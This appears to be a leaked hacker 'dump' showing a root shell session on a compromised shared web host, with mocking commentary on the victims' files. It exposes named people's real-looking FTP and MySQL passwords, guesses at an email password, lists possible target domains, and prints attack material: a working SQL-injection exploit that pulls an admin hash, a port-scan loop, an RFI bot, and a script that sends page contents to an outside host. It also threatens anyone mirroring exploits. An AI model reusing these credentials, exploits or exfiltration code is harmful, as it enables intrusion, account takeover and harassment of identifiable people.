sh-3.1# cd ../md5hasher
sh-3.1# ls -la
total 16
drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 .
drwxr-xr-x 13 infosec infosec 4096 Jun 9 2008 ..
-rw-r--r-- 1 infosec infosec 477 Feb 22 2007 index.html
-rw-r--r-- 1 infosec infosec 380 Feb 22 2007 md5er.php
sh-3.1# cat md5er.php
Untitled Document

Your origional text:

Your md5 hashed text:



// Another vulnerable PHP code..

sh-3.1# cd ../phpscanner
sh-3.1# ls -la
total 12
drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 .
drwxr-xr-x 13 infosec infosec 4096 Jun 9 2008 ..
-rw-r--r-- 1 infosec infosec 353 Feb 22 2007 index.php
sh-3.1# cat index.php
";
$i = $start;
$j = $end+1;
for($i;$i<$j;$i++)
{
$fp = @fsockopen($host,$i,&$errno,&$errstr,1);
if (!$fp) {
echo "Port $i is closed!

";
}
else {
echo "Port $i is open!

";
}
}
?>
sh-3.1# cd ~infosec
sh-3.1# head domain.txt
1and1.com.cy
24092008ccci.uibs.net
4pilates.net
7sette.com
adamides.uibs.net
aepiphaniou.com
aerokinisi.com
aerokinisi.uibs.net
akeso.com
akeso.gr

// Possible targets?

sh-3.1# cat host2port.sh
#!/bin/sh
echo .:: astalavista.com ::. Ips2Port Checker - Written by nowayout
for i in `cat hostnames.txt`; do
echo Scanning for Remote Administrator Port $i : 4899;
nmap -v -sS -P0 -p 4899 $i
done

// :O

sh-3.1# cat host.c
/*
Date: 04/03/2008
Private Hostname2IP Resolver v1.3 - Custom Edition
*/
#include
#include
#include
#define TITLE "Hostname2IP Resolver"
#define VERSION "1.3"
void write_file(char *buf);
void banner();
int main(int argc, char *argv[])
{
    if (argc > 2) {
        const number_of_hosts = 101;
        int count;
        int i;
        char host[256];
        char File_Buf[256];
        struct hostent *he;
        struct in_addr **addr_list;
        struct in_addr addr;
        for(count=0;counth_name, inet_ntoa(*(struct in_addr*)he->h_addr));
            write_file(File_Buf);
        }
    }
    else {
        banner();
        printf("\n---------------------------------------------\n");
        printf("Usage: %s prefix suffix\n",argv[0]);
        printf("Example: %s cypa no-ip.biz\n",argv[0]);
        printf("Result: cypa-0.no-ip.biz 69.65.19.125\n");
        printf("---------------------------------------------\n\n");
    }
    return 0;
}
void write_file(char *buf)
{
    FILE *fp=fopen("resolve.txt","a+");
    fprintf(fp,"%s\n",buf);
    fclose(fp);
    printf("%s\n",buf);
}
void banner()
{
    fprintf(stderr, "\n%s %s\n", TITLE, VERSION);
    fprintf(stderr, "astalavista.com\n\n");
}

// Private scanner. k?
sh-3.1# cat infosecbackup.php
sh-3.1# cat infosecbackup.sh
#!/bin/bash
# Remote FTP Backup Script
# Author: Charalambous Glafkos
# Contact: glafkos@itsolutionskb.com
# Visit: http://www.itsolutionskb.com
# Copyright 2008 IT Solutions KB
FTPStatus=y
HOST='nowayout.no-ip.org'
USERNAME='backup'
PASSWORD='b4ckup$#'
REMOTEDIR=`date +'%d-%m-%Y'`
HOSTNAME='/bin/hostname'
LOCALDIR='/backups/cpbackup/daily'
[snip]

// Can someone _please_ tell me what is with Astalavista staff and backup scripts?

sh-3.1# cd perl
sh-3.1# ls -la
total 12
drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 .
drwx--x--x 29 infosec infosec 4096 Jun 8 12:15 ..
-rw-r--r-- 1 infosec infosec 820 Jun 14 2007 1.pl
sh-3.1# cat 1.pl
#!/usr/bin/perl -w
use LWP::UserAgent; #load the LWP Library for www access
die "Example: perl exploit.pl http://www.target.com/\n" unless @ARGV; # if argument null display usage
$b = LWP::UserAgent->new() or die "Could not initialize browser\n"; # create new UserAgent from LWP library
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); # define agent as IE7
$host = $ARGV[0] . "low.php?topic=' UNION SELECT 0,0,0,CONCAT(CHAR(58),username,CHAR(58),password),0,0,0,0,0 FROM flforum_users WHERE userid=1/*";
$res = $b->request(HTTP::Request->new(GET=>$host)); # make the GET request
$answer = $res->content; #request
if ($answer =~ /raquo; :(.*?):/){
print "\nAdmin User is: $1\n";
}
if ($answer =~/([0-9a-fA-F]{32})/){print "\nAdmin Hash : $1\n";}
else{print "\n[-] Exploit Failed...\n";}

// -_-'

sh-3.1# cd ..
sh-3.1# head rfibot.pl
#!/usr/bin/perl
##
# Priv8 ~ Priv8 ~ Priv8 ##
# Author: fr1ul^h4ck ##
# An A-Team production ##
# keep it priv8 ~ keep it priv8 ##
# Read the source code, and understand how to use it ;) ##
# Use your brain :P !! Don't lame :D ##
# Release 1.5 ##
# Only for educational purpose. ** ##
# NEVER REMOVE THE AUTHOR, AND ** <== ##

// LOL. The CEH uses a 'Priv8' RFI bot, hot damn.
sh-3.1# cd .sqlier sh-3.1# ls -la total 12 drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 . drwx--x--x 29 infosec infosec 4096 Jun 8 12:15 .. -rw-r--r-- 1 infosec infosec 121 Oct 25 2007 exploits sh-3.1# cat exploits www.articlesitedemo.com YUhSMGNEb3ZMM2QzZHk1aGNuUnBZMnhsYzJsMFpXUmxiVzh1WTI5dEwzTjFZbk5qY21sd2RHbHZiaTV3YUhBPTo6Ojo6Og== sh-3.1# cd .. sh-3.1# head test.c /* Author: Charalambous Glafkos Site: http://www.infosec.org.uk Contact: glafkos@infosec.org.uk Date: 08/03/2008 Title: Hostname2IP Resolver v1.3 */ sh-3.1# cd public_html/ sh-3.1# ls -la total 372 drwxr-x--- 33 infosec nobody 4096 May 9 12:27 . drwx--x--x 29 infosec infosec 4096 Jun 8 12:15 .. drwxr-xr-x 6 infosec infosec 4096 Jun 9 2008 admin drwxrwxr-x 9 infosec infosec 4096 Jun 9 2008 ads drwxrwxrwx 2 infosec infosec 4096 Jun 9 2008 cache drwxr-xr-x 2 infosec infosec 4096 Jun 9 2007 cgi-bin drwxr-xr-x 4 infosec infosec 4096 Jul 31 2008 characters drwxrwxrwx 2 infosec infosec 4096 Jun 9 2008 config drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 core drwxr-xr-x 17 infosec infosec 4096 Jun 9 2008 core_modules drwxr-xr-x 3 infosec infosec 4096 Jul 31 2008 dataurl -rw-r--r-- 1 infosec infosec 7564 Nov 19 2007 domainsearch.php drwxr-xr-x 3 infosec infosec 4096 Jun 9 2008 editor drwxr-xr-x 4 infosec infosec 4096 Jul 31 2008 encoding drwxr-xr-x 11 infosec infosec 4096 Jun 7 22:01 exploits drwxrwxrwx 2 infosec infosec 4096 Dec 18 11:40 feed drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 ffplugin -rw-r--r-- 1 infosec infosec 46801 Oct 21 2008 glafkos_cv_0day.pdf -rw-r--r-- 1 infosec infosec 42392 Feb 20 2008 glafkos_cv.pdf -rw-r--r-- 1 infosec infosec 1571 Oct 26 2007 htaccess -rw-r--r-- 1 infosec infosec 323 Jul 31 2008 .htaccess drwxrwxrwx 11 infosec infosec 4096 Jun 9 2008 images -rw-r--r-- 1 infosec infosec 61356 Sep 26 2007 index.php drwxr-xr-x 6 infosec infosec 4096 Jul 31 2008 ip2country drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 javascripts drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 js drwxr-xr-x 12 
infosec infosec 4096 Jun 9 2008 jsthemes drwxr-xr-x 8 infosec infosec 4096 Jun 9 2008 lang drwxr-xr-x 18 infosec infosec 4096 Jun 9 2008 lib drwxr-xr-x 9 infosec infosec 4096 Jul 26 2008 md5 drwxrwxrwx 7 infosec infosec 4096 Jun 9 2008 media drwxr-xr-x 19 infosec infosec 4096 Jun 9 2008 modules -rw-r--r-- 1 infosec infosec 514 Mar 3 2008 nl.txt -rw-r--r-- 1 infosec infosec 328 Mar 22 2007 offline.html -rw-r--r-- 1 infosec infosec 3162 Apr 15 2008 out.sql drwxr-xr-x 3 infosec infosec 4096 Dec 18 12:16 _php drwxr-xr-x 3 infosec infosec 4096 Jul 31 2008 phpfunctions drwxr-xr-x 9 infosec infosec 4096 Jul 31 2008 ports drwxr-xr-x 2 infosec infosec 4096 Jun 9 2008 rc -rw-r--r-- 1 infosec infosec 26 Mar 22 2007 robots.txt -rw-r--r-- 1 infosec infosec 3650 Jun 2 2008 rsa_challenge.txt -rwxrwxrwx 1 infosec infosec 8796 Apr 18 2008 sitemap.xml -rw-r--r-- 1 infosec infosec 25401 Nov 19 2007 style.css drwxrwxrwx 4 infosec infosec 4096 Jun 9 2008 themes drwxrwxrwx 3 infosec infosec 4096 Jun 9 2008 tmp drwxr-xr-x 3 infosec infosec 4096 Jun 9 2008 toc -rw-r--r-- 1 infosec infosec 5373 Nov 14 2007 whois.php sh-3.1# head index.php // Ok, We understand Glafkos's password theory now... name-of-service$#@!... does that mean his email password is email$#@! 
or maybe it is gl4fk05$# ;)
sh-3.1# cat milupdater.sh
#!/bin/bash
# Define your options
cd /home/infosec/www/exploits
WGET="/usr/bin/wget --quiet --timestamping"
PHP="/usr/bin/php -q"
RM="/bin/rm -Rf"
BZIP2="/usr/bin/bzip2 -d"
TAR="/bin/tar -xf"
CP="/bin/cp -Rf"
# Do not touch below these lines
if [ -z "${SCRIPTHOME}" ]; then
    SCRIPTHOME=${HOME}/www/exploits
fi
if [ -e "${SCRIPTHOME}/sploitlist.txt" ]; then
    ${RM} ${SCRIPTHOME}/sploitlist.txt
fi
if [ -e "${SCRIPTHOME}/milw0rm.tar.bz2" ]; then
    ${RM} ${SCRIPTHOME}/milw0rm*
fi
${WGET} -P ${SCRIPTHOME} http://www.milw0rm.com/sploits/milw0rm.tar.bz2
${BZIP2} ${SCRIPTHOME}/milw0rm.tar.bz2
${TAR} ${SCRIPTHOME}/milw0rm.tar
if [ -d "${SCRIPTHOME}/milw0rm" ]; then
    ${RM} ${SCRIPTHOME}/platforms
    ${RM} ${SCRIPTHOME}/rport
    ${CP} ${SCRIPTHOME}/milw0rm/sploitlist.txt ${SCRIPTHOME}/
    ${CP} ${SCRIPTHOME}/milw0rm/sploitlist-bt.txt ${SCRIPTHOME}/
    ${CP} ${SCRIPTHOME}/milw0rm/platforms/ ${SCRIPTHOME}/
    ${CP} ${SCRIPTHOME}/milw0rm/rport/ ${SCRIPTHOME}/
else
    echo -n Error: There is no milw0rm directory extracted
fi
if [ -e "${SCRIPTHOME}/sploitlist.txt" ]; then
    ${PHP} ${SCRIPTHOME}/DBImport.php
else
    echo -n Error: There is no sploitlist.txt file for importing to the database
fi
${RM} ${SCRIPTHOME}/milw0rm.tar*
// Let us put it this way for you guys/gals, If you by any means mirror milw0rm / exploits, you are a target and you _will_ be rm'd. only a matter of time.
sh-3.1# tail sploitlist.txt
./rport/80/8340.py XBMC 8.10 (get tag from file name) Remote Buffer Overflow Exploit
./rport/80/8354.py XBMC 8.10 GET Request Remote Buffer Overflow Exploit (SEH) (univ)
./rport/80/8363.py XBMC 8.10 (HEAD) Remote Buffer Overflow Exploit (SEH)
./rport/21/8398.php ftpdmin 0.96 RNFR Remote Buffer Overflow Exploit (xp sp3/case study)
./rport/8000/8421.py Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [1]
./rport/8000/8422.py Steamcast (HTTP Request) Remote Buffer Overflow Exploit (SEH) [2]
./rport/80/8554.py Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit
./rport/21/8716.py httpdx <= 0.5b FTP Server (USER) Remote BOF Exploit (SEH)
./rport/21/8732.py httpdx <= 0.5b FTP Server (CWD) Remote BOF Exploit (SEH)
./rport/2242/8804.py Soulseek 157 NS Remote Buffer Overflow Exploit (SEH)
// Oh lawd, he actually saves the exploit with its extension live on his server... "Only two things are infinite, the universe and human stupidity, and I'm not sure about the former."
sh-3.1# cd ..
sh-3.1# cd md5/
sh-3.1# ls -al
total 1168
drwxr-xr-x 9 infosec infosec 4096 Jul 26 2008 .
drwxr-x--- 33 infosec nobody 4096 May 9 12:27 ..
drwxr-xr-x 3 infosec infosec 4096 Jul 26 2008 admin drwxr-xr-x 4 infosec infosec 4096 Jul 26 2008 ajax -rw-r--r-- 1 infosec infosec 350 Jul 26 2008 conn.php -rw-r--r-- 1 infosec infosec 313 Jul 26 2008 content.php -rw-r--r-- 1 infosec infosec 674 Jul 26 2008 cpanel.php -rw-r--r-- 1 infosec infosec 6837 Jul 26 2008 cracker.php -rw-r--r-- 1 infosec infosec 1265 Jul 26 2008 DbConnector.php drwxr-xr-x 2 infosec infosec 4096 Jul 26 2008 diablo -rw-r--r-- 1 infosec infosec 23 Jul 26 2008 footer.php -rw-r--r-- 1 infosec infosec 14 Jul 26 2008 footertext.php -rw-r--r-- 1 infosec infosec 4096 Jul 26 2008 functions.php -rw-r--r-- 1 infosec infosec 1520 Jul 26 2008 header.php -rw-r--r-- 1 infosec infosec 68 Jul 26 2008 .htaccess drwxr-xr-x 2 infosec infosec 4096 Jul 26 2008 images -rw-r--r-- 1 infosec infosec 30129 Jul 26 2008 index2 -rw-r--r-- 1 infosec infosec 3893 Dec 1 2008 index.php -rw-r--r-- 1 infosec infosec 84 Jul 26 2008 index.php1 -rw-r--r-- 1 infosec infosec 161 Jul 26 2008 index_sample.php -rw-r--r-- 1 infosec infosec 2567 Jul 26 2008 install.php drwxr-xr-x 2 infosec infosec 4096 May 9 12:25 md5 -rw-r--r-- 1 infosec infosec 4317 Jul 26 2008 md5.php -rw-r--r-- 1 infosec infosec 1016335 Jul 26 2008 MD5.rar -rw-r--r-- 1 infosec infosec 754 Jul 26 2008 md5.sql -rw-r--r-- 1 infosec infosec 12032 Jul 26 2008 milw0rm.html drwxr-xr-x 2 infosec infosec 4096 Jul 26 2008 new -rw-r--r-- 1 infosec infosec 1171 Jul 26 2008 proxy.php drwxr-xr-x 3 infosec infosec 4096 Mar 16 18:23 scripts -rw-r--r-- 1 infosec infosec 551 Jul 26 2008 search.php -rw-r--r-- 1 infosec infosec 2345 Jul 26 2008 style.css -rw-r--r-- 1 infosec infosec 309 Jul 26 2008 SystemComponent.php sh-3.1# cat conn.php sh-3.1# cd md5/ sh-3.1# head plaincrack.py #!usr/bin/python #Creates a list of all the cracked md5's #from plain-text.info and writes them to a file. 
#http://www.darkc0de.com #d3hydr8[at]gmail[dot]com sh-3.1# head dumpcrack1.2.py #!/usr/bin/python #Collects all md5's from a database dump and #attempts to crack them with a wordlist and #milw0rms database. If one is cracked #it will print out the line it was found on. #Options: output format and email address search #http://www.darkc0de.com #d3hydr8[at]gmail[dot]com sh-3.1# head rss.php /usr/local/apache/domlogs/x00mario -rw-r--r-- 1 x00mario x00mario 24 Jan 17 2008 .bash_logout -rw-r--r-- 1 x00mario x00mario 191 Jan 17 2008 .bash_profile -rw-r--r-- 1 x00mario x00mario 124 Jan 17 2008 .bashrc -rw------- 1 x00mario x00mario 0 Jan 17 2008 .contactemail drwx------ 5 x00mario x00mario 4096 Jun 10 2008 .cpanel -rw-r----- 1 x00mario x00mario 1 Jan 15 01:03 cpbackup-exclude.conf drwxr-xr-x 3 x00mario x00mario 4096 Jul 25 2008 cpmove.psql -rw-r--r-- 1 x00mario x00mario 6 Jul 29 2008 .dns -rw-r--r-- 1 x00mario x00mario 383 Jan 17 2008 .emacs drwxr-x--- 3 x00mario mail 4096 Jun 10 2008 etc -rw------- 1 x00mario x00mario 13 May 27 00:04 .ftpquota drwxr-x--- 2 x00mario nobody 4096 Jul 25 2008 .htpasswds -rw-r--r-- 1 x00mario x00mario 7 Jul 25 2008 .lang -rw------- 1 x00mario x00mario 13 Apr 21 2008 .lastlogin drwxrwx--- 7 x00mario x00mario 4096 Jul 25 2008 mail drwxr-xr-x 3 x00mario x00mario 4096 Jul 25 2008 public_ftp drwxr-x--- 11 x00mario nobody 4096 Feb 15 15:08 public_html drwxr-xr-x 7 x00mario x00mario 4096 Sep 24 2008 tmp drwx------ 2 x00mario x00mario 4096 Jan 21 2008 .trash lrwxrwxrwx 1 x00mario x00mario 11 Jul 25 2008 www -> public_html -rw-r--r-- 1 x00mario x00mario 658 Jul 25 2008 .zshrc sh-3.1# cd www sh-3.1# ls -la total 372 drwxr-x--- 11 x00mario nobody 4096 Feb 15 15:08 . drwx--x--x 11 x00mario x00mario 4096 Feb 16 17:24 .. 
drwxr-xr-x 3 x00mario x00mario 4096 May 23 12:41 0x.lv -rw-r--r-- 1 x00mario x00mario 1956 Jan 21 2008 1446883a7480.html -rw-r--r-- 1 x00mario x00mario 257 Feb 15 15:08 almost_owned -rw-r--r-- 1 x00mario x00mario 468 Jan 21 2008 anonymous_array.php drwxr-xr-x 2 x00mario x00mario 4096 Jan 17 2008 cgi-bin drwxr-xr-x 3 x00mario x00mario 4096 Oct 19 2008 characters -rw-r--r-- 1 x00mario x00mario 21472 Jan 21 2008 c.js -rw-r--r-- 1 x00mario x00mario 21472 Jan 21 2008 C.JS drwxr-xr-x 2 x00mario x00mario 4096 Oct 19 2008 datauri drwxr-xr-x 2 x00mario x00mario 4096 Oct 19 2008 dataurl -rw-r--r-- 1 x00mario x00mario 263 Jan 21 2008 distributor.php drwxr-xr-x 3 x00mario x00mario 4096 May 21 08:27 encoding -rw-r--r-- 1 x00mario x00mario 2274 Jan 21 2008 favicon.ico -rw-r--r-- 1 x00mario x00mario 523 Apr 9 2008 .htaccess -rw-r--r-- 1 x00mario x00mario 43 Jan 21 2008 i.html -rw-r--r-- 1 x00mario x00mario 21369 Jan 21 2008 i.js -rw-r--r-- 1 x00mario x00mario 21377 Jan 21 2008 I.JS -rw-r--r-- 1 x00mario x00mario 21586 Oct 21 2008 j.js -rw-r--r-- 1 x00mario x00mario 21395 Jan 21 2008 J.JS drwxr-xr-x 4 x00mario x00mario 4096 Jun 10 2008 kishor drwxr-xr-x 5 x00mario x00mario 4096 Jun 10 2008 lockr drwxr-xr-x 3 x00mario x00mario 4096 Nov 24 2008 mailgun -rw-r--r-- 1 x00mario x00mario 309 Jan 21 2008 mozxssc.xml -rw-r--r-- 1 x00mario x00mario 310 Feb 8 2008 mozxsspc.xml -rw-r--r-- 1 x00mario x00mario 309 Jan 21 2008 mozxss.xml -rw-r--r-- 1 x00mario x00mario 21434 Feb 8 2008 pc.js -rw-r--r-- 1 x00mario x00mario 21416 Jan 21 2008 p.js -rw-r--r-- 1 x00mario x00mario 7846 Jan 21 2008 vectors -rw-r--r-- 1 x00mario x00mario 21472 Jan 21 2008 x.js -rw-r--r-- 1 x00mario x00mario 29522 Oct 20 2008 xss-assistant.user.js -rw-r--r-- 1 x00mario x00mario 133 Jan 30 2008 xss.htc -rw-r--r-- 1 x00mario x00mario 5614 Oct 20 2008 xss_post_forwarder.php -rw-r--r-- 1 x00mario x00mario 18401 Oct 20 2008 xss.xml sh-3.1# cat almost_owned This file is part of an experiment proving the dangers of invisible 
text inside BBCode tags. There's no real vector or backdoor or comparable - just this text file as a proof of concept. Feel free to contact x00mario@gmail.com if you wish to know more.
// BBCode invisible tags are dangerous, run!
sh-3.1# cd 0x.lv
sh-3.1# ls -la
total 40
drwxr-xr-x 3 x00mario x00mario 4096 May 23 12:41 .
drwxr-x--- 11 x00mario nobody 4096 Feb 15 15:08 ..
drwxr-xr-x 2 x00mario x00mario 4096 Feb 13 2008 cgi-bin
-rw-r--r-- 1 x00mario x00mario 95 Feb 13 2008 index.html
-rw-r--r-- 1 x00mario x00mario 509 Mar 31 2008 l.php
-rw-r--r-- 1 x00mario x00mario 211 May 23 12:41 mozxss.xml
-rw-r--r-- 1 x00mario x00mario 56 May 23 12:41 test.css
-rw-r--r-- 1 x00mario x00mario 204 May 23 08:44 w2.xml
-rw-r--r-- 1 x00mario x00mario 4834 May 23 08:45 w3.xml
sh-3.1# cat l.php
var img = document.createElement('IMG');
img.src = 'http://0x.lv/l.php?dom=' + escape(document.firstChild.innerHTML);
img.style.visibility = 'hidden';
document.firstChild.appendChild(img);
// Nothing interesting, moving on..
sh-3.1# cd ~itkb
sh-3.1# ls -la
total 172176
drwx--x--x 14 itkb itkb 4096 Jun 9 00:59 .
drwxr-xr-x 43 root root 4096 Jun 9 00:20 ..
lrwxrwxrwx 1 itkb itkb 30 Jan 28 06:11 access-logs -> /usr/local/apache/domlogs/itkb -rw------- 1 itkb itkb 176000180 Jun 3 00:23 backup-6.3.2009_00-05-06_itkb.tar.gz -rw------- 1 itkb itkb 14561 Jun 8 08:45 .bash_history -rw-r--r-- 1 itkb itkb 24 Oct 24 2008 .bash_logout -rw-r--r-- 1 itkb itkb 176 Oct 24 2008 .bash_profile -rw-r--r-- 1 itkb itkb 124 Oct 24 2008 .bashrc -rw------- 1 itkb itkb 22 May 17 06:16 .contactemail drwxr-xr-x 5 itkb itkb 4096 Nov 20 2008 .cpanel -rw-r----- 1 itkb itkb 1 Jan 15 00:05 cpbackup-exclude.conf drwxr-xr-x 3 itkb itkb 4096 Jan 28 06:11 cpmove.psql -rw-r--r-- 1 itkb itkb 17 Jun 8 11:41 .dns -rw-r--r-- 1 itkb itkb 2336 Jun 5 00:07 error_log drwxr-x--- 3 itkb mail 4096 Jan 28 06:11 etc drwx------ 2 itkb itkb 4096 Nov 27 2008 .gnupg drwxr-x--- 3 itkb nobody 4096 Dec 1 2008 .htpasswds -rw-r--rw- 1 itkb itkb 2035 Mar 19 05:55 itkbbackup.php -rw-r--r-- 1 itkb itkb 7 Oct 24 2008 .lang -rw------- 1 itkb itkb 14 Apr 23 18:03 .lastlogin -rw------- 1 itkb itkb 35 Nov 14 2008 .lesshst drwxrwx--- 7 itkb itkb 4096 May 27 21:11 mail drwxr-xr-x 3 itkb itkb 4096 Apr 22 16:25 psd drwxr-xr-x 3 itkb itkb 4096 Jul 25 2008 public_ftp drwxr-xr-x 9 itkb nobody 4096 Jun 5 03:51 public_html -rw------- 1 itkb itkb 1024 Oct 25 2008 .rnd drwx------ 4 itkb itkb 4096 Nov 27 2008 ssl drwxr-xr-x 7 itkb itkb 4096 Nov 20 2008 tmp drwxr-xrwx 2 itkb itkb 4096 Nov 26 2008 wpau-backup lrwxrwxrwx 1 itkb itkb 11 Jan 28 06:11 www -> public_html -rw-r--r-- 1 itkb itkb 658 Oct 24 2008 .zshrc sh-3.1# cd public_html sh-3.1# ls -la total 2312 drwxr-xr-x 9 itkb nobody 4096 Jun 5 03:51 . drwx--x--x 14 itkb itkb 4096 Jun 9 00:59 .. 
drwxr-xr-x 2 itkb itkb 4096 Jun 5 03:52 ads drwxr-xr-x 2 itkb itkb 4096 Apr 15 22:13 certified drwxr-xr-x 2 itkb itkb 4096 Oct 24 2008 cgi-bin -rw-r--r-- 1 nobody nobody 1240873 Jun 4 10:19 error_log -rw-r--r-- 1 itkb itkb 7888 Oct 31 2008 fd.js -rw-r--r-- 1 itkb itkb 1517 Nov 6 2008 .htaccess -rw-r--r-- 1 itkb itkb 397 Mar 19 06:45 index.php -rw-r--r-- 1 nobody nobody 397 Mar 19 06:45 index.php.wpau.bak -rw-r--r-- 1 itkb itkb 3429 Apr 15 20:40 itsolutionskb_link.png -rw-r--r-- 1 itkb itkb 15410 Mar 19 06:45 license.txt -rw-r--r-- 1 root root 410 Jun 4 10:49 nmap.txt -rw-r--r-- 1 nobody nobody 7638 Mar 19 06:45 readme.html -rw-r--r-- 1 itkb itkb 106 Nov 1 2008 robots.txt -rwxrwxrwx 1 itkb itkb 647199 May 28 06:04 sitemap.xml -rwxrwxrwx 1 itkb itkb 22804 May 28 06:04 sitemap.xml.gz -rw-r--r-- 1 itkb itkb 89589 Oct 31 2008 slideshow.swf -rw-r--r-- 1 itkb itkb 2297 May 6 08:02 slideshow.xml drwxr-xr-x 7 itkb itkb 4096 Dec 11 04:49 wp-admin -rw-r--r-- 1 itkb itkb 40271 Mar 19 06:45 wp-app.php -rw-r--r-- 1 itkb itkb 220 Mar 19 06:45 wp-atom.php drwxr-xrwx 2 itkb itkb 4096 Mar 19 06:47 wpau-backup -rw-r--r-- 1 itkb itkb 274 Mar 19 06:45 wp-blog-header.php -rw-r--r-- 1 itkb itkb 3424 Mar 19 06:45 wp-comments-post.php -rw-r--r-- 1 itkb itkb 238 Mar 19 06:45 wp-commentsrss2.php -rw-r--r-- 1 itkb itkb 1645 Dec 4 2008 wp-config.php drwxr-xr-x 10 itkb itkb 4096 Apr 29 04:29 wp-content -rw-r--r-- 1 itkb itkb 1242 Mar 19 06:45 wp-cron.php -rw-r--r-- 1 itkb itkb 220 Mar 19 06:45 wp-feed.php drwxr-xr-x 5 itkb itkb 4096 Dec 11 04:49 wp-includes -rw-r--r-- 1 itkb itkb 1986 Mar 19 06:45 wp-links-opml.php -rw-r--r-- 1 itkb itkb 2004 Mar 19 06:45 wp-load.php -rw-r--r-- 1 itkb itkb 19738 Mar 19 06:45 wp-login.php -rw-r--r-- 1 itkb itkb 6932 Mar 19 06:45 wp-mail.php -rw-r--r-- 1 itkb itkb 487 Mar 19 06:45 wp-pass.php -rw-r--r-- 1 itkb itkb 218 Mar 19 06:45 wp-rdf.php -rw-r--r-- 1 itkb itkb 316 Mar 19 06:45 wp-register.php -rw-r--r-- 1 itkb itkb 220 Mar 19 06:45 wp-rss2.php -rw-r--r-- 1 
itkb itkb 218 Mar 19 06:45 wp-rss.php -rw-r--r-- 1 itkb itkb 18695 Mar 19 06:45 wp-settings.php -rw-r--r-- 1 itkb itkb 3434 Mar 19 06:45 wp-trackback.php -rw-r--r-- 1 itkb itkb 92428 Mar 19 06:45 xmlrpc.php sh-3.1# cat wp-config.php /usr/local/apache/domlogs/ryb -rw-r--r-- 1 ryb ryb 190 Feb 8 2006 .addon-installlog -rw------- 1 ryb ryb 20 Feb 8 2006 .addonscgi-phpBB -rw-r--r-- 1 ryb ryb 11242 May 9 12:20 .bash_history -rw-r--r-- 1 ryb ryb 304 Nov 18 2005 .bash_logout -rw-r--r-- 1 ryb ryb 191 Nov 18 2005 .bash_profile -rw-r--r-- 1 ryb ryb 124 Nov 18 2005 .bashrc drwx------ 3 ryb ryb 4096 Jun 16 2008 .bittorrent -rw------- 1 ryb ryb 0 Nov 18 2005 .contactemail drwxr-xr-x 3 ryb ryb 4096 Jun 16 2008 .cpaddons -rw-r--r-- 1 ryb ryb 0 Oct 11 2006 .cpaddons_notify drwxr-xr-x 4 ryb ryb 4096 Aug 12 2008 .cpanel -rw------- 1 ryb ryb 5977 Jul 26 2004 .cpanel-ducache -rw-r----- 1 ryb ryb 1 Jan 15 01:03 cpbackup-exclude.conf drwxr-xr-x 3 ryb ryb 4096 Jul 26 2008 cpmove.psql -rw-r--r-- 1 ryb ryb 15 May 9 12:15 .dns -rw-r--r-- 1 ryb ryb 383 Nov 18 2005 .emacs drwxr-x--- 3 ryb mail 4096 Jun 16 2008 etc -rw-r--r-- 1 ryb ryb 47 Feb 14 2005 file -rw------- 1 ryb ryb 17 May 27 00:04 .ftpquota drwxr-x--- 4 ryb nobody 4096 Jun 16 2008 .htpasswds -rw-r--r-- 1 ryb ryb 7 Jul 26 2008 .lang -rw------- 1 ryb ryb 13 Jul 12 2007 .lastlogin drwx------ 2 ryb ryb 4096 Aug 11 2007 logs drwxrwx--- 10 ryb ryb 4096 May 30 10:19 mail -rwx------ 1 ryb ryb 32 Jun 29 2004 .my.cnf drwx------ 3 ryb ryb 4096 Jun 16 2008 .neomail drwx------ 3 ryb ryb 4096 Jun 16 2008 .neomail-nowayout -rwx------ 1 ryb ryb 44893 Nov 18 2005 pkgacct drwxr-xr-x 3 ryb ryb 4096 Jul 26 2008 public_ftp drwxr-x--- 31 ryb nobody 4096 May 9 12:19 public_html drwx------ 2 ryb ryb 4096 Jul 3 2004 .ssh drwx------ 8 ryb ryb 4096 Sep 24 2008 tmp drwxr-xr-x 2 ryb ryb 4096 Jan 25 2006 .tmp drwx------ 2 ryb ryb 4096 Dec 15 2004 .trash lrwxrwxrwx 1 ryb ryb 11 Jul 26 2008 www -> public_html -rw-r--r-- 1 ryb ryb 658 Jul 26 2008 .zshrc // This is 
rootyourbox.org, oh the lulz. sh-3.1# cat .my.cnf [client] user=ryb pass=si060482 // Same password from astalavista.net database. mmmm sh-3.1# cd public_html sh-3.1# ls -la total 3696 drwxr-x--- 31 ryb nobody 4096 May 9 12:19 . drwx--x--x 19 ryb ryb 4096 Jun 9 01:11 .. -rwxrwxrwx 1 ryb ryb 13471 Sep 16 2007 1.tar.gz -rw-r--r-- 1 ryb ryb 0 Jul 26 2004 404.shtml drwxr-xr-x 9 ryb ryb 4096 Jun 16 2008 administrator -rw-r--r-- 1 ryb ryb 621 Jun 29 2004 agreement.html -rw-r--r-- 1 ryb ryb 29 Nov 3 2006 a.php -rw-r--r-- 1 ryb ryb 5029 Jul 10 2007 avatar.gif -rwxrwxrwx 1 ryb ryb 26648 Jun 7 2007 avatar.jpg -rw-r--r-- 1 ryb ryb 815 Jun 29 2004 bandwidth_exceed.html drwxrwxrwx 2 ryb ryb 4096 Jun 16 2008 cache -rw-r--r-- 1 ryb ryb 1363 Jun 15 2004 cache.php -rw-r--r-- 1 ryb ryb 17603 Aug 10 2006 celica2.jpg -rw-r--r-- 1 ryb ryb 93142 Aug 10 2006 celica.jpg drwxr-xr-x 2 ryb ryb 4096 Jun 16 2008 cgi-bin -rw-r--r-- 1 ryb ryb 87954 Aug 28 2006 CHANGELOG.php -rw-r--r-- 1 ryb ryb 515722 Dec 7 2004 check.jpg -rw-r--r-- 1 ryb ryb 28942 Mar 12 2006 ci8.torrent -rw-r--r-- 1 ryb ryb 746 Jan 26 2007 cmd.txt -rw-r--r-- 1 ryb ryb 1114 Jun 15 2004 code.php drwxrwxrwx 17 ryb ryb 4096 Jun 16 2008 components -rw-r--r-- 1 ryb ryb 553 Jun 24 2007 config.php -rw-rw-rw- 1 ryb ryb 2625 Nov 19 2006 configuration.php -rw-r--r-- 1 ryb ryb 259 Jun 27 